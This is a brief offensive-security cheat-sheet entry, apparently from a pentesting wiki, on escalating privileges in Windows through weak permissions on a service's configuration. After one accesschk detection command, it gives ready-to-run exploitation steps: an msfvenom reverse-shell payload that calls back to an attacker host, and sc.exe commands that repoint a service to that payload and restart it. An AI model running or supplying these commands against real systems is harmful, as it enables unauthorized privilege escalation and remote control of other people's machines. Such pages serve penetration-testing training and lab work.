Weak Permissions on Service Config

Detection

accesschk.exe /accepteula -uwcqv "Authenticated Users" *

Exploitation

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.1 LPORT=1337 -f exe -o malicious.exe

sc.exe config ServiceName binpath="C:\Temp\malicious.exe"
sc.exe stop ServiceName
sc.exe start ServiceName

PreviousUnquoted Service Name NextWeak Permissions on Service Binary

Last updated 7 months ago